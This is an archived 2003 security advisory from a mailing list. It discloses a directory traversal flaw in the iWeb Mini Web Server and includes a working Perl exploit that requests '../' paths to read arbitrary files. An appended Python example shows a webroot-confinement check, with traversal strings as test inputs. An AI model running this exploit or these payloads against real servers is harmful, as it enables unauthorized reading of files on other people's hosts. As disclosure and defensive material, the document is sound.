From subversive@linuxmail.org Wed Apr 16 03:28:46 2003
From: subversive
X-Originating-IP: 139.80.123.36
To: vulnwatch@vulnwatch.org
Date: Wed, 16 Apr 2003 16:24:13 +1200
Subject: [VulnWatch] SFAD03-001: iWeb Mini Web Server Remote Directory Traversal

[=================================================================]
[...............:[ S e c u r i t y   F r e a k s ]:...............]
[.................:[ www.securityfreaks.com ]:..................]
[=================================================================]

Title         : iWeb Mini Web Server Remote Directory Traversal
Risk          : Moderate - Low
Software      : iWeb Mini Web Server
Platforms     : Windows NT/XP/9x
Vendor URL    : http://www.ashleybrown.co.uk/iweb/
Discovered by : subversive
Advisory ID   : SFAD03-001

.....:[ Overview :

The iWeb Mini Web Server is a mini web server designed for use on
Intranets and for testing websites in a realistic environment.

.....:[ Details :

iWeb does not correctly filter ../ sequences in GET requests, which
allows a remote client to escape the webroot and traverse the
directory structure of the host.

.....:[ Vendor Status :

14/04/03 Initial Contact Made
15/04/03 Vendor Responded
15/04/03 Vendor Released Updated Version

.....:[ Solution :

Remove old iWeb application and download and install the updated
version which can be found at:
http://ashleybrown.co.uk/downloads/iws2.exe

.....:[ Exploit - SF-iwsuk.pl :

#!/usr/bin/perl -w
#
# S e c u r i t y   F r e a k s
# www.securityfreaks.com
#
# iWeb Mini Web Server Remote Directory Traversal
#
# subversive[at]linuxmail.org - *15/04/2003*

use IO::Socket;

if(!$ARGV[0]) {
print <<"IWEBSUK";

S e c u r i t y   F r e a k s
www.securityfreaks.com
-------------------------------------------------------------
SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
-------------------------------------------------------------
Usage: $0

IWEBSUK
    exit;
}
else {
    $host = $ARGV[0];
}

if(!$ARGV[2]) {
    $port = "80";
}
else {
    $port = $ARGV[2];
}

my $sock = new IO::Socket::INET (
    Proto    => "tcp",
    PeerAddr => $host,
    PeerPort => $port,
);

die "\nConnection to $host:$port failed\n" unless $sock;

print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";

while(<$sock>) {
    print
}

close($sock);

print("\n\n");
exit;
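
.....:[ Added example - webroot confinement check :

The Details section describes a server that maps the GET path to disk without filtering ../ sequences. The Python sketch below is an added example, not the vendor's fix and not code from the advisory: it shows the check such a server needs, resolving the request target under Windows path rules and refusing anything that lands outside the webroot. The function name, the exception class and the C:\iweb\wwwroot path are assumptions made for illustration.

```python
import ntpath
from urllib.parse import unquote

WEBROOT = r"C:\iweb\wwwroot"   # constructed sample webroot, not from the advisory


class TraversalError(ValueError):
    """The request target resolves outside the webroot."""


def resolve_in_webroot(webroot: str, target: str) -> str:
    """Map a GET request target to a Windows path confined to webroot."""
    path = target.split("?", 1)[0].split("#", 1)[0]   # drop query / fragment
    path = unquote(path)            # decode once (%2e%2e%2f, %5c) before checking
    if "\x00" in path:
        raise TraversalError("NUL byte in path")
    path = path.replace("\\", "/")  # Windows accepts both separators
    rel = path.lstrip("/")          # never let the client supply an absolute path
    if ":" in rel:                  # drive letters and NTFS alternate data streams
        raise TraversalError("':' not allowed in path")
    root = ntpath.normpath(webroot)
    candidate = ntpath.normpath(ntpath.join(root, rel))   # collapses every ".."
    # Compare case-insensitively and with a trailing separator, so a sibling
    # directory such as C:\iweb\wwwroot2 does not count as inside the webroot.
    n_root, n_cand = ntpath.normcase(root), ntpath.normcase(candidate)
    if n_cand != n_root and not n_cand.startswith(n_root + "\\"):
        raise TraversalError(f"{target!r} escapes the webroot")
    return candidate


if __name__ == "__main__":
    # Constructed request targets: two legitimate, four traversal variants.
    samples = [
        "/index.html",
        "/docs/../index.html",
        "/../../../../../../../../../secret.txt",
        "/%2e%2e/%2e%2e/secret.txt",
        "/..%5c..%5csecret.txt",
        "/../wwwroot2/index.html",
    ]
    for t in samples:
        try:
            print("serve ", t, "->", resolve_in_webroot(WEBROOT, t))
        except TraversalError as exc:
            print("reject", t, "->", exc)
```

The check is purely lexical: it does not follow junctions or symbolic links, so a link inside the webroot that points elsewhere still needs separate handling.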